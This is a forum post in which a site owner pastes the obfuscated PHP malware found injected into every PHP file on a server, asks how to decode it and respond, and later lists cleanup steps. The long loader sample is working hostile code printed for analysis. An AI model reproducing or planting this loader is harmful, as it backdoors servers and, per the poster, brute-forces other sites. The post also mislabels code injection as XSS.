My server is infected with XSS attack. All of the php files (all of wordpress, my custom .php scripts and applications) have got injected with a similar type of encrypted code seen as below.
What is the course of action in a situation like this? I've read about preventing XSS but couldn't find a solid guide on what to do when already got attacked.
Also, I wonder is it possible to decrypt the injected php code below:
<?php $wwykwjmqa = '281Ld]245]K2]285]Ke]53Ldd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*4<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<7fw6<*K)ftpmdXA6|7**197*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*#>m%:|:*r%:-t%)3of:opjudo%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.mif((function_exists(" x6f 1#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)mg%!)!gj!<2,*j%!-#1]#-bu,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2-K)ebfsX x27u%)7fmjix2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%d($n)-1);} @error_reporting(0); $effwexo :>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)*#j{hnpd#)tutjyf`opjudovg x22)!gj}56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn x7fw6*CW&)7gj6<*doj%7-C)fepmqz+sfwjidsb`bj+upcotn+qsvmt+fmhpph! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i# x24#-!#]y38#-!%w:**<")));$dsngrwc d%6<pd%w6Z6<.4`hA x27pd%6< x24- x24!>! x24/%tjw/ x24)% x24- x24y4 x24- x281]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27p!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!os!osvufs}w;* x7f!>> x22!pd%)!gj}Z!-id%)uqpuft`msvd},;um!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-4]y8 x24- x24]26 x24- x2b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#<%tpz!>!#]D6M7]K3#<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH]672]48y]#>s%<#462]47y]252]18y]#>q%<qpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;]53]Kc]55Ld]55#*<%bG9}:}.}6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#/% x24- x24!>!fyqmpef)# x24*<!%t::!y3f]51L3]84]y31M6]y3e]81 x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#*!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw5 x52 137 x41 107 x45 116 x54"]); if ((strstr($uas," x6d 163 x69 11~!<2p% x7f!~!<##!>!2p%Z<^2 x5c8M7]381]211M5]67]452]88]5]48]32M3]316e"; function wfvpmkm($n){return chr(or323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]#762]67y]562]38y]572]48y]dy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&by84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]25x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24-%yy>#]D6]281L1#/#M5]DgP5]D6#<%f#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)d:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)pmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1111276<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudo.uofuopD#)sfebfI{*w%)kVOBALS[" x61 156 x75 156 x6de#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!g28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opobE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]W%c:>1<%b:>1<!gps)%j#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!-}!#*<%nfd>%fdy<Cb*[%h!>!= $haczumi("", $effwexo); $dg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:62 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 xpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<72qj%6<^#zsfvr# x5cqvg<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ypd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppvufs!~<3,j%>j%!*3! x27!h*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc1"]=1; $uas=strtolower($_SE=])0#)U! x27{**u%-#jt0}Z;0]=]0#pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x2-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB-*.%)euhA)3of>2bd%!<5h%/#0#/*#npS[" x61 156 x75 156 x61"])))) { $GL#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52fyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,45")) or (strstr($uas," x72 166 x3a 61 x31"))) { $haczumi = " x63 1w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%r%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj36* x7f_*#fubfsdXk5`{66~6<&w6<|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`= implode(array_map("wfvpmkm",42 x5f 163 x74 141 x72 164") && (!isset($GLOBALsngrwc();}}vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*x{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#7]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<57ftbc x7f!|!*uyfu x27kmsvd}R;*msv%)}.;`UQPMSVDh%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]sv`ftsbqA7>q%6< x7fwppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2njA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`str_split("%tjw!>!#]y84]275]y83]248]y83]256]yxB%h>#]y31]278]y3e]81mjg}[;ldpt%}K;`ufldpt}X;`7pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoFhopmA x273qj%6<*Y%)fnbozcYufhA x2)2q%l}S;2-u%!-#2#/#%#/#o]#/*) x7f x7f x7f<u%V x27{ftmfV xRVER[" x48 124 x54 120 x5f 125 x53 10sTrREvxNoiTCnuf_EtaerCxECalPer_Rtszbpugxmqd'; $xadaat=explode(chr((833-713)),substr($wwykwjmqa,(40926-35049),(188-154))); $ghhrhvx = $xadaat[0]($xadaat[(6-5)]); $ohxwtrqt = $xadaat[0]($xadaat[(11-9)]); if (!function_exists('dulwdh')) { function dulwdh($xjtystpc, $ukgzlz,$luupugng) { $bzudlnhrz = NULL; for($gynqittgr=0;$gynqittgr<(sizeof($xjtystpc)/2);$gynqittgr++) { $bzudlnhrz .= substr($ukgzlz, $xjtystpc[($gynqittgr*2)],$xjtystpc[($gynqittgr*2)+(4-3)]); } return $luupugng(chr((55-46)),chr((294-202)),$bzudlnhrz); }; } $fjslgcupn = explode(chr((164-120)),'333,27,5103,47,4482,35,3015,26,4296,27,5840,37,1993,66,4769,67,3755,52,2126,39,579,41,5073,30,5558,45,1075,67,1002,26,4354,38,5649,49,2818,70,493,21,2888,49,1656,37,126,23,4392,58,4934,63,5750,33,3840,20,4882,52,284,49,5442,20,4997,29,733,30,5511,47,2624,50,4708,61,1924,69,1622,34,3373,49,5624,25,5359,24,1219,21,1548,48,1187,32,4596,62,1142,45,4098,24,404,24,3171,44,2570,54,2743,43,1240,49,862,43,149,54,650,34,2059,31,514,65,4450,32,24,53,1366,61,1864,60,763,33,3215,58,3807,33,4122,63,2354,60,3136,35,4517,43,5026,47,5336,23,2674,69,2937,55,5161,37,684,49,4046,52,3041,57,3422,60,5812,28,2786,32,5462,49,5698,52,2992,23,5198,38,1693,70,4323,31,5783,29,2165,41,2414,63,5288,48,5383,59,3098,38,3988,58,1512,36,2206,25,203,25,3860,67,2477,62,1823,41,1028,47,1342,24,77,49,796,66,1763,36,905,61,3927,61,3273,44,1447,65,428,65,4836,46,5603,21,4658,50,4185,45,1799,24,4230,66,1427,20,2539,31,2231,54,3317,36,0,24,1596,26,3566,25,228,56,2285,69,2090,36,5236,52,3682,44,3726,29,3353,20,620,30,3482,64,3546,20,4560,36,3619,63,1289,53,360,44,966,36,3591,28,5150,11'); $cagbthgj = $ghhrhvx("",dulwdh($fjslgcupn,$wwykwjmqa,$ohxwtrqt)); $ghhrhvx=$wwykwjmqa; $cagbthgj(""); $cagbthgj=(638-517); $wwykwjmqa=$cagbthgj-1; ?>
Just to understand what it does and where it got in?
Thanks in advance for all the help!
Ok, so wanted to share an update and close this. Here is what I did to overcome my server injection.
1) Wrote down a script which goes every php file and look for the injected code, if found removes it. (The injected code has similar beginning and ending pattern)
2) Changed passwords for server logins.
3) Updated very very old wordpress sites in the server.
Seems that this injected code was used for bruteforcing other wordpress & cpanels btw.